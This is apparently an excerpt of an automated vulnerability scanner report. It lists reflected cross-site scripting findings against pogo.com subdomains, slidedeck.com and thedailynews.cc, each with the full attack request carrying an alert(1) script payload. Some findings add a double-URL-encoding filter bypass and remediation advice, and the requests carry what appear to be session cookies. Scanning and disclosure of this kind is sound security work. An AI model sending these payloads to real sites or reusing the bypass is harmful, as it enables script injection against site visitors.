GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?intcmp=fp_mtx_mb_minis_275c88%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e723870b2cf6&pageSection=free_home_mtx_shopping HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c915%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4cf12ef1b83 was submitted in the pageSection parameter. This input was echoed as 3c915</script><script>alert(1)</script>4cf12ef1b83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /hotdeploy/us/promotions/marketing/bgca/landing-page.jsp?&intcmp=fp_mtx_mb_minis_1&pageSection=free_home_mtx_shopping3c915%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4cf12ef1b83 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c79ff%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42a5d9a0e0d was submitted in the pageSection parameter. This input was echoed as c79ff</script><script>alert(1)</script>42a5d9a0e0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp?pageSection=homnav_iphonec79ff%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42a5d9a0e0d HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
3.616. http://www.pogo.com/prize/prize.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pogo.com
Path: /prize/prize.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15d82"><script>alert(1)</script>a5d2698d48f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /prize/prize.do?pageSection=footer_prize&15d82"><script>alert(1)</script>a5d2698d48f=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of the pageSection request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b79d%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28f760955af was submitted in the pageSection parameter. This input was echoed as 8b79d</script><script>alert(1)</script>28f760955af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the pageSection request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /prize/prize.do?pageSection=footer_prize8b79d%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28f760955af HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
3.618. http://www.pogo.com/sitemap [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pogo.com
Path: /sitemap
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9b56"><script>alert(1)</script>c47acb8a68d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap?a9b56"><script>alert(1)</script>c47acb8a68d=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://www.pogo.com/sitemap?a9b56"><script>alert(1)</script>c47acb8a68d=1"/> ...[SNIP]...
3.619. https://www.pogo.com/action/pogo/signin.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.pogo.com
Path: /action/pogo/signin.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ac9"><script>alert(1)</script>0baf35176c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /action/pogo/signin.do?pageSection=footer_login&29ac9"><script>alert(1)</script>0baf35176c0=1 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 71eb8--><script>alert(1)</script>873957fd8a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /download71eb8--><script>alert(1)</script>873957fd8a7 HTTP/1.1
Host: www.slidedeck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:10:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 03:10:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.slidedeck.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28374
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head> <meta charset=" ...[SNIP]... <!-- This Quick Cache file was built for ( www.slidedeck.com/download71eb8--><script>alert(1)</script>873957fd8a7 ) in 0.65286 seconds, on Jan 9th, 2011 at 3:10 am UTC. --> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5bb51--><script>alert(1)</script>578321f4700 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /usage-documentation5bb51--><script>alert(1)</script>578321f4700 HTTP/1.1
Host: www.slidedeck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:09:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 03:09:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.slidedeck.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head> <meta charset=" ...[SNIP]... <!-- This Quick Cache file was built for ( www.slidedeck.com/usage-documentation5bb51--><script>alert(1)</script>578321f4700 ) in 1.84841 seconds, on Jan 9th, 2011 at 3:09 am UTC. --> ...[SNIP]...
3.622. http://www.thedailynews.cc/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.thedailynews.cc
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a39c5"><script>alert(1)</script>16e0513e3bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?a39c5"><script>alert(1)</script>16e0513e3bf=1 HTTP/1.1
Host: www.thedailynews.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 01:20:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Sat, 08 Jan 2011 01:20:42 GMT
Set-Cookie: UID=15824304; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSASAASQB=FDNAOIEABLECEOILNOBIAMFL; path=/
Cache-control: private
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e300f</script><script>alert(1)</script>d94ebed0ad1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e300f</script><script>alert(1)</script>d94ebed0ad1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91bb8</script><script>alert(1)</script>1a8a6141c5c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/monopoly HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=91bb8</script><script>alert(1)</script>1a8a6141c5c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f9be</script><script>alert(1)</script>b2070efcc4c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/online-chess HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5f9be</script><script>alert(1)</script>b2070efcc4c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a90c</script><script>alert(1)</script>f1db3c1e137 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/risk HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1a90c</script><script>alert(1)</script>f1db3c1e137
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0ce5</script><script>alert(1)</script>85f9e6f8132 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: card-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d0ce5</script><script>alert(1)</script>85f9e6f8132
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48660</script><script>alert(1)</script>7be45d0934c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /games/rainy-day-spider-solitaire HTTP/1.1
Host: card-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=48660</script><script>alert(1)</script>7be45d0934c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f2d1</script><script>alert(1)</script>166a472ed8a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: clubpogo-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4f2d1</script><script>alert(1)</script>166a472ed8a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42e11</script><script>alert(1)</script>27787d232a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: flash-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=42e11</script><script>alert(1)</script>27787d232a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24687</script><script>alert(1)</script>491924de1e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
